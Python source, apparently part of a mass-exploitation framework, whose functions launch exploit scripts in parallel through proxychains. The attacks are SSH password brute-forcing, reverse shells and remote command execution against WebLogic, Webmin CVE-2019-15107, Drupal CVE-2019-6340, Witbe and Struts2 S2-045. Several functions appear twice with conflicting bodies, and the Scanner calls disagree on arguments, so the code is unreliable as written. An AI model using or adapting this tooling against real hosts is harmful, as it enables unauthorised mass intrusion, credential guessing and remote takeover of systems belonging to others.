def ssh_bruteforcer(session):
'''
call single thread ssh_bruteforcer
'''
password_list = console.input_check(
"[*] Password list file to use: ", allow_blank=False)
if not os.path.isfile(password_list):
console.print_error("[-] Password list not found")
return None
# command to exec
command = console.input_check("[*] Command to exec: ", allow_blank=False)
# args list
exploit = 'ssh_bruteforce.py'
work_path = '/ssh-bruteforce/'
exec_path = exploit
custom_args = str(password_list + ' ' + command).split()
jobs = 100
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
' '.join(custom_args)))
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def ssh_bruteforcer(session):
'''
bruteforce one target using a password list
'''
colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE)
password_list = console.input_check(
"[*] Password list file to use (put them under ./data): ", allow_blank=False,
choices=glob.glob(core.MECROOT+"/data/*.txt"))
if not os.path.isfile(password_list):
console.print_error("[-] Password list not found")
return None
# command to exec
command = console.input_check("[*] Command to exec: ", allow_blank=False)
# args list
exploit = 'ssh_bruteforce.py'
work_path = '/ssh-bruteforce/'
exec_path = exploit
custom_args = ["-p", password_list, "-c", command]
jobs = 100
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic(session):
'''
with reverse shell
'''
print(colors.BLUE +
'\n[*] Welcome to Weblogic getshell exploit' +
colors.END)
server_port = console.input_check(
"[?] What's the port of Welogic server? ",
check_type=int)
os_type = console.input_check(
'[?] Windows or Linux? [w/l] ', choices=['w', 'l'])
if console.input_check('[?] Do you need a reverse shell? [y/n] ',
choices=['y', 'n']) == 'y':
shell_server = console.input_check(
'[?] What\'s the IP of shell receiver? ',
allow_blank=False, ip_check=True)
port = console.input_check(
'[?] What\'s the port of shell receiver? ',
check_type=int)
if os_type.lower() == 'w':
custom_args = '-l {} -p {} -P {} --silent -T '.format(
shell_server, port, server_port) +\
'reverse_shell -os win'
custom_args = custom_args.split()
elif os_type.lower() == 'l':
custom_args = '-l {} -p {} -P {} --silent -T '.format(
shell_server, port, server_port) +\
'reverse_shell -os linux'
custom_args = custom_args.split()
else:
console.print_error('[-] Invalid input')
return None
else:
cmd = console.input_check(
'[?] What command do you want to execute on the target? ',
allow_blank=False).strip()
if os_type.lower() == 'w':
custom_args = '-P {} --silent -T exploit -c {} -os win'.format(
server_port, cmd).split()
elif os_type.lower() == 'l':
custom_args = '-P {} --silent -T exploit -c {} -os linux'.format(
server_port, cmd).split()
else:
return None
# start scanner
exploit = 'weblogic.py'
work_path = '/weblogic/'
exec_path = exploit
jobs = 100
# waitTime = 25 # deprecated
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def webmin_cve_2019_15107(session):
'''
CVE_2019_15107 RCE
'''
colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE)
# shell server config
command = console.input_check(
'[?] Command to execute on the target: ', allow_blank=False)
# exploit config
exploit = 'webmin.py'
work_path = '/webmin/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session):
'''
witbe rce
'''
colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE)
# shell server config
rhost = console.input_check('[?] IP of your shell server: ', ip_check=True)
rport = console.input_check('[?] and Port? ', check_type=int)
# exploit config
exploit = 'witbe.py'
work_path = '/witbe/'
exec_path = exploit
custom_args = ["-l", rhost, "-p", rport]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def drupal_cve20196340(session):
'''
drupal RCE
'''
colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE)
# shell server config
command = console.input_check('[?] Command to execute on the target: ',
allow_blank=False)
# exploit config
exploit = 'cve-2019-6340_cmd.py'
work_path = '/drupal/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def weblogic_cve201710271(session):
'''
CVE-2017-10271
'''
colors.colored_print(
'\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE)
# shell server config
command = console.input_check(
'[?] Command to execute on the target: ', allow_blank=False)
# exploit config
exploit = 'weblogic_cve-2017-10271.py'
work_path = '/weblogic/'
exec_path = exploit
custom_args = ["-c", command]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session):
'''
witbe rce
'''
print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END)
# shell server config
rhost = console.input_check('[?] IP of your shell server: ')
rport = console.input_check('[?] and Port? ', check_type=int)
# exploit config
exploit = 'witbe.py'
work_path = '/witbe/'
exec_path = exploit
custom_args = str('-l ' + rhost + ' -p ' + rport).split()
jobs = 50
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path),
' '.join(custom_args))
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def s2_045(session):
'''
struts2 045 rce
'''
print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END)
port = console.input_check(
'[?] What\'s the port of your target server? ',
check_type=int)
# args list
exploit = 's2_045_cmd.py'
work_path = '/structs2/'
exec_path = exploit
custom_args = str('-p ' + port).split()
jobs = 100
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
' '.join(custom_args)))
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic_cve201710271(session):
'''
CVE-2017-10271
'''
colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271',
colors.BLUE)
# shell server config
command = console.input_check('[?] Command to execute on the target: ',
allow_blank=False)
target_os = console.input_check(
"[?] Target OS, default to linux [linux/win]: ",
choices=["linux", "win"])
# exploit config
exploit = 'weblogic_cve-2017-10271.py'
work_path = '/weblogic/'
exec_path = exploit
custom_args = ["-c", command, "-os", target_os]
jobs = 50
# start scanner
return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
